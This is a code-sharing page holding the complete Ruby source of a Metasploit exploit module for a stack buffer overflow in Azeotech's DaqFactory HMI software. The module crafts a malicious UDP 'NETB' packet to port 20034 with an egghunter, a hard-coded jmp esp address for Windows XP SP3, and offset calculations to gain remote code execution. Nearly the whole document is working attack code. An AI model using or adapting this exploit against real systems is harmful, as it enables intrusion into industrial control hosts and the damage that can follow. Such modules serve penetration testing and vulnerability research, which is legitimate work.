扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 |
## # $Id: daq_factory_bof.rb 13750 2011-09-18 02:45:55Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'DaqFactory HMI NETB Request Overflow', 'Description'=> %q{ This module exploits a stack buffer overflow in Azeotech's DaqFactory product. The specfic vulnerability is triggered when sending a specially crafted 'NETB' request to port 20034. Exploitation of this vulnerability may take a few seconds due to the use of egghunter.This vulnerability was one of the 14 releases discovered by researcher Luigi Auriemma. }, 'Author' => [ 'Luigi Auriemma',# Initial discovery, crash poc 'mr_me <steventhomasseeley[at]gmail.com>',# msf exploit ], 'Version'=> '$Revision: 13750 $', 'References' => [ ['URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload'=> { 'Space'=> 600, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets'=> [ [ 'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3', { 'Ret' => 0x100B9EDF,# jmp esp PEGRP32A.dll 'Offset' => 636, } ], ], 'DisclosureDate' => 'Sep 13 2011', 'DefaultTarget'=> 0)) register_options( [ # Required for EIP offset OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]), Opt::RPORT(20034) ], self.class) end def exploit connect_udp print_status("Trying target #{target.name}...") eggoptions ={ :checksum => false, :eggtag => 'scar', } # Correct the offset according to the 2nd IP (DHCP) length iplen = datastore['DHCP'].length if iplen == 15 offset = 78 elsif iplen == 14 offset = 79 elsif iplen == 13 offset = 80 elsif iplen == 12 offset = 81 elsif iplen == 11 offset = 82 elsif iplen == 10 offset = 83 elsif iplen == 9 offset = 84 elsif iplen == 8 offset = 85 elsif iplen == 7 offset = 86 elsif iplen == 6 offset = 87 # attack class A ip, slightly unlikly, but just in case. elsif iplen == 5 offset = 88 end if offset >= 80 pktoffset = offset - 80 finaloffset = target['Offset']-pktoffset elsif offset <= 79 pktoffset = 80 - offset finaloffset = target['Offset']+pktoffset end # springboard onto our unmodified payload p = Rex::Arch::X86.jmp(750) + payload.encoded hunter,egg = generate_egghunter(p, payload_badchars, eggoptions) sploit= "NETB"# NETB request overflow sploit << rand_text_alpha_upper(233) sploit << "\x00"# part of the packet structure sploit << rand_text_alpha_upper(offset)# include the offset for the DHCP address sploit << make_nops(2) sploit << hunter sploit << rand_text_alpha_upper(52-hunter.length-2) sploit << [target.ret].pack("V") sploit << rand_text_alpha_upper(12) sploit << Rex::Arch::X86.jmp_short(-70) sploit << egg # packetlen needs to be adjusted to a max of 0x400 as per advisory sploit << rand_text_alpha_upper(finaloffset-egg.length) # The use of rand_text_alpha_upper() ensures we always get the same length for the # first IP address. See the following for more details: # http://dev.metasploit.com/redmine/issues/5453 sploit[12,4] = rand_text_alpha_upper(4) udp_sock.put(sploit) handler disconnect_udp end end |
体验盒子
